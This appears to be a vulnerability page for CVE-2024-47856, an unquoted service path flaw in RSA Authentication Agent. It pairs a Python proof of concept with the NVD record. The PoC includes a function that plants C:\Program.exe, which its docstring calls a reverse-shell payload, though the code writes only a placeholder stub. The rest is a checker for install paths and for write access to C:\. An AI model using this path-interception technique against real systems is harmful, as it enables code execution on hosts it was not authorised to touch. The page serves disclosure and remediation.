CVE-2024-47856

# CVE-2024-47856 Path Interception PoC # Target: RSA Authentication Agent < 7.4.7 # Attack Vector: Place malicious executable in parent directory import os import shutil import ctypes import sys def create_malicious_executable(): """ Create a malicious executable that will be used for path interception. This example creates a reverse shell payload. """ # Malicious executable name that matches the parent directory malicious_exe_path = r"C:\Program.exe" # Create a simple malicious executable (for demonstration) # In real attack, this would be a meterpreter or similar payload malicious_code = b'MZ' + b'\x00' * 100 # Minimal PE header with open(malicious_exe_path, 'wb') as f: f.write(malicious_code) return malicious_exe_path def check_vulnerability(): """ Check if the system is vulnerable to CVE-2024-47856 """ # Check if RSA Authentication Agent is installed rsa_paths = [ r"C:\Program Files\RSA\Authentication Agent\bin\AuBatch.exe", r"C:\Program Files\RSA\Authentication Agent\bin\SecurIDLogon.dll", r"C:\Program Files (x86)\RSA\Authentication Agent\bin\AuBatch.exe" ] vulnerable = False for path in rsa_paths: if os.path.exists(path): print(f"[+] RSA Authentication Agent found at: {path}") vulnerable = True # Check if parent directory is writable if vulnerable: parent_dir = r"C:\Program Files\RSA\Authentication Agent\bin" parent_parent = r"C:\Program Files\RSA\Authentication Agent" # If C:\ is writable, system is vulnerable if os.access(r"C:\\", os.W_OK): print("[!] System is VULNERABLE - parent directory is writable") print("[!] Attacker can place malicious Program.exe in C:\\") else: print("[-] System may not be vulnerable - insufficient permissions") return vulnerable if __name__ == "__main__": print("CVE-2024-47856 Path Interception Vulnerability Checker") print("=" * 60) check_vulnerability() print("\nRemediation: Upgrade to RSA Authentication Agent 7.4.7 or later")

{"cve": {"id": "CVE-2024-47856", "sourceIdentifier": "[email protected]", "published": "2025-11-24T22:15:46.820", "lastModified": "2025-12-30T17:25:32.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In RSA Authentication Agent before 7.4.7, service paths and shortcut paths may be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks. An adversary can place an executable in a higher-level directory of the path, and Windows will resolve that executable instead of the intended executable."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rsa:authentication_agent_for_windows:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.4.7", "matchCriteriaId": "F35038B7-C8FD-4AFF-8D42-D59061A370D8"}]}]}], "references": [{"url": "https://community.rsa.com/s/article/RSA-2024-13-RSA-Authentication-Agent-for-Microsoft-Windows-Security-Update", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://community.rsa.com/s/product-download/a9G4u000000mCOYEAU/rsa-authentication-agent-747-for-microsoft-windows", "source": "[email protected]", "tags": ["Permissions Required"]}]}}